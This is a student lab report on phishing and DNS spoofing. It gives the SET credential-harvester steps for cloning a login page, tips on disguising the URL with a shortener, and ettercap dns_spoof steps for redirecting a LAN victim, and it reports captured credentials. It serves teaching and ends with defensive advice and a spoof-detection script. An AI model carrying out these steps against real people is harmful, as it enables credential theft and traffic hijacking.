2017-2018-2 20155203 "Network Countermeasure Technology" Exp7: Internet Fraud Prevention

1. Answers to basic questions

(1) What scenarios are usually vulnerable to DNS spoof attacks?

Being connected to a wireless network, on the same local area network as the attacker.

(2) How to prevent the above two attack methods in daily work?

First of all, never click on a web page that the browser considers unsafe. If you must open it, test it with fake information before entering and submitting any real information. Phishing websites may not redirect. The internet.

2. Record of practice process

- 1. Simple application of SET tool to create a fake website

Operations on the attacking machine:

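1. The phishing site will be hosted under the local machine's HTTP service, so the SET tool's access port needs to be changed to the default port 80.
Use sudo vi /etc/apache2/ports.conf
Change the port number after Listen to 80 (it is usually 80 already).

2. Check whether any process is occupying port 80
netstat -tupln |grep 80
If there is one,
kill <process ID>

3. Use apachectl start to start the Apache service

4. Enter setoolkit to open the SET tool
  
1) Social-Engineering Attacks
->
2) Website Attack Vectors
->
3) Credential Harvester Attack Method
->
1) Web Templates or 2) Site Cloner
->
Enter the IP of Kali (the attacking machine)
->
Enter the URL you have chosen (this step does not appear if you select Web Templates; with Site Cloner, enter the address of the website to imitate)

Note that at this point you will be asked whether to stop the Apache service (y or n); choose y.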

The URL of the phishing site can be disguised with a URL shortener.

Opening this link may take a few seconds to redirect.

Disguising as www.cnblogs.com failed: a page that does not display the login link is useless, so the phishing should be more direct and use the cnblogs (Blog Garden) login URL as the disguise. However, since the human-verification component cannot be loaded, the login name and password cannot be sent back to the server, so I abandoned cnblogs...

In the step after Website Attack Vectors, choose Web Templates instead of Site Cloner. There will be 5 disguise domain names to choose from, and after selecting one, a phishing website is generated.
Chrome shows that the webpage is not secure:

Success: the account and password were captured!

- 2. ettercap DNS spoof

This process mainly sniffs the target host's access to a domain name that has been bound to the attacking machine's IP.

Procedure on the attacking machine:

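1. Use the command ifconfig eth0 promisc to put the Kali network card into promiscuous mode

2. Enter the command vi /etc/ettercap/etter.dns to modify the DNS cache table
Add "domain-name A attacker-ip"

3. Enter the command ettercap -G to start ettercap

4. In the toolbar, click Sniff -> unified sniffing, keep the default eth0, and confirm.

5. Under Hosts, first click Scan for hosts to scan the subnet, then click Hosts list to view the live hosts (in NAT mode you will only see your own virtual machines and the host)

6. Add the IP of Kali's gateway (x.x.x.2) to target1 and the target machine's IP to target2

7. Plugins -> Manage the plugins, double-click dns_spoof

8. Start->Start Sniffing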

From the target machine, ping the domain name previously bound to the attacking machine, or access it directly, and the attacking machine will receive the message.
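Seen from the target machine, the etter.dns entry above makes a public domain name resolve to an address on the victim's own LAN, and a forged reply can be followed by the genuine one for the same query. The check below is an added example, not part of the original report; the log format, addresses, domain names and function names are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed DNS reply log seen by the victim: time, transaction ID, name, type, answer.
SAMPLE_LOG = """\
10.001 0x3a1f www.example.com A 192.168.56.130
10.034 0x3a1f www.example.com A 203.0.113.10
11.200 0x77c2 www.example.org A 203.0.113.20
12.480 0x0b15 printer.lab.example A 192.168.56.40
"""

def parse(log):
    """Yield (txid, qname, answer) for every A-record reply line."""
    for line in log.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[3] == "A":
            yield fields[1], fields[2].lower().rstrip("."), ipaddress.ip_address(fields[4])

def lan_answers(log, local_net, internal_suffixes=()):
    """Names that resolve into the local subnet but are not known internal names."""
    net = ipaddress.ip_network(local_net)
    hits = {}
    for _, qname, answer in parse(log):
        internal = any(qname == s or qname.endswith("." + s) for s in internal_suffixes)
        if answer in net and not internal:
            hits[qname] = str(answer)
    return hits

def conflicting_replies(log):
    """Queries (same transaction ID and name) that received different answers."""
    seen = defaultdict(set)
    for txid, qname, answer in parse(log):
        seen[(txid, qname)].add(answer)
    return {key: [str(a) for a in sorted(answers)]
            for key, answers in seen.items() if len(answers) > 1}

if __name__ == "__main__":
    print(lan_answers(SAMPLE_LOG, "192.168.56.0/24", ("lab.example",)))
    print(conflicting_replies(SAMPLE_LOG))
```

Names that are meant to resolve to LAN hosts go in internal_suffixes so that only unexpected LAN answers are reported.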

- 3. Combine the application of two technologies, use DNS spoof to guide specific access to impostor websites

This combines the previous two steps; the main point is that the domain name used when visiting looks more credible.

3. Practice summary and experience

The experiment is very simple to do, which shows how easy it is for others on the same wireless LAN to collect our information when they want to attack us. It also shows that we are in danger all the time in the network environment, so we must be vigilant and prevent problems before they happen.
